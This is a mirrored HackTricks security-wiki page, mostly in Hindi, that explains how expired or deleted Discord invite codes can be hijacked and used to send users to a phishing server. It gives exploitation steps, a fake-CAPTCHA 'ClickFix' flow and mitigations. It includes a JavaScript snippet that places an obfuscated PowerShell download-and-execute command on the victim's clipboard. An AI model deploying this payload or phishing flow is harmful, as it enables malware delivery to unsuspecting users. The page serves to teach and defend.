maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity
hacktricks/src/generic-methodologies-and-resources/phishing-methodology/discord-invite-hijacking.md

62 lines
8.0 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Discord Invite Hijacking
{{#include ../../banners/hacktricks-training.md}}
Discord के आमंत्रण प्रणाली की कमजोरी खतरे के तत्वों को समाप्त या हटाए गए आमंत्रण कोड (अस्थायी, स्थायी, या कस्टम वैनिटी) को किसी भी स्तर 3 बूस्टेड सर्वर पर नए वैनिटी लिंक के रूप में दावा करने की अनुमति देती है। सभी कोड को लोअरकेस में सामान्यीकृत करके, हमलावर ज्ञात आमंत्रण कोड को पूर्व-रजिस्टर कर सकते हैं और मूल लिंक समाप्त होने या स्रोत सर्वर के बूस्ट खोने पर चुपचाप ट्रैफ़िक को हाईजैक कर सकते हैं।
## Invite Types and Hijack Risk
| Invite Type | Hijackable? | Condition / Comments |
|-----------------------|-------------|------------------------------------------------------------------------------------------------------------|
| Temporary Invite Link | ✅ | समाप्ति के बाद, कोड उपलब्ध हो जाता है और इसे एक बूस्टेड सर्वर द्वारा वैनिटी URL के रूप में फिर से रजिस्टर किया जा सकता है। |
| Permanent Invite Link | ⚠️ | यदि हटाया गया और केवल लोअरकेस अक्षरों और अंकों से बना है, तो कोड फिर से उपलब्ध हो सकता है। |
| Custom Vanity Link | ✅ | यदि मूल सर्वर अपना स्तर 3 बूस्ट खो देता है, तो इसका वैनिटी आमंत्रण नए रजिस्ट्रेशन के लिए उपलब्ध हो जाता है। |
## Exploitation Steps
1. Reconnaissance
- सार्वजनिक स्रोतों (फोरम, सोशल मीडिया, टेलीग्राम चैनल) पर आमंत्रण लिंक की निगरानी करें जो पैटर्न `discord.gg/{code}` या `discord.com/invite/{code}` से मेल खाते हैं।
- रुचि के आमंत्रण कोड (अस्थायी या वैनिटी) एकत्र करें।
2. Pre-registration
- स्तर 3 बूस्ट विशेषाधिकार के साथ एक नया या मौजूदा Discord सर्वर बनाएं या उपयोग करें।
- **Server Settings → Vanity URL** में, लक्षित आमंत्रण कोड को असाइन करने का प्रयास करें। यदि स्वीकार किया जाता है, तो कोड दुर्भावनापूर्ण सर्वर द्वारा आरक्षित है।
3. Hijack Activation
- अस्थायी आमंत्रण के लिए, मूल आमंत्रण समाप्त होने की प्रतीक्षा करें (या यदि आप स्रोत को नियंत्रित करते हैं तो इसे मैन्युअल रूप से हटा दें)।
- बड़े अक्षरों वाले कोड के लिए, लोअरकेस संस्करण को तुरंत दावा किया जा सकता है, हालांकि रीडायरेक्शन केवल समाप्ति के बाद सक्रिय होता है।
4. Silent Redirection
- पुराने लिंक पर जाने वाले उपयोगकर्ताओं को हमलावर-नियंत्रित सर्वर पर बिना किसी रुकावट के भेजा जाता है जब हाईजैक सक्रिय होता है।
## Phishing Flow via Discord Server
1. सर्वर चैनलों को इस तरह से सीमित करें कि केवल **#verify** चैनल दिखाई दे।
2. नए उपयोगकर्ताओं को OAuth2 के माध्यम से सत्यापित करने के लिए प्रेरित करने के लिए एक बॉट (जैसे, **Safeguard#0786**) तैनात करें।
3. बॉट उपयोगकर्ताओं को एक फ़िशिंग साइट (जैसे, `captchaguard.me`) पर रीडायरेक्ट करता है जो CAPTCHA या सत्यापन चरण के रूप में प्रकट होती है।
4. **ClickFix** UX ट्रिक लागू करें:
- एक टूटी हुई CAPTCHA संदेश प्रदर्शित करें।
- उपयोगकर्ताओं को **Win+R** संवाद खोलने, एक प्रीलोडेड PowerShell कमांड पेस्ट करने और Enter दबाने के लिए मार्गदर्शन करें।
### ClickFix Clipboard Injection Example
```javascript
// Copy malicious PowerShell command to clipboard
const cmd = `powershell -NoExit -Command "$r='NJjeywEMXp3L3Fmcv02bj5ibpJWZ0NXYw9yL6MHc0RHa';` +
`$u=($r[-1..-($r.Length)]-join '');` +
`$url=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($u));` +
`iex (iwr -Uri $url)"`;
navigator.clipboard.writeText(cmd);
```
इस दृष्टिकोण से सीधे फ़ाइल डाउनलोड से बचा जाता है और उपयोगकर्ता की संदेह को कम करने के लिए परिचित UI तत्वों का लाभ उठाया जाता है।
## Mitigations
- स्थायी आमंत्रण लिंक का उपयोग करें जिसमें कम से कम एक बड़ा अक्षर या गैर-अक्षरांकित चरित्र हो (कभी समाप्त न हों, पुन: उपयोग करने योग्य न हों)।
- नियमित रूप से आमंत्रण कोड को घुमाएँ और पुराने लिंक को रद्द करें।
- Discord सर्वर बूस्ट स्थिति और वैनिटी URL दावों की निगरानी करें।
- उपयोगकर्ताओं को सर्वर की प्रामाणिकता की पुष्टि करने और क्लिपबोर्ड-पेस्ट किए गए कमांड को निष्पादित करने से बचने के लिए शिक्षित करें।
## References
- From Trust to Threat: Hijacked Discord Invites Used for Multi-Stage Malware Delivery [https://research.checkpoint.com/2025/from-trust-to-threat-hijacked-discord-invites-used-for-multi-stage-malware-delivery/](https://research.checkpoint.com/2025/from-trust-to-threat-hijacked-discord-invites-used-for-multi-stage-malware-delivery/)
- Discord Custom Invite Link Documentation [https://support.discord.com/hc/en-us/articles/115001542132-Custom-Invite-Link](https://support.discord.com/hc/en-us/articles/115001542132-Custom-Invite-Link)
{{#include ../../banners/hacktricks-training.md}}
Reference in New Issue View Git Blame Copy Permalink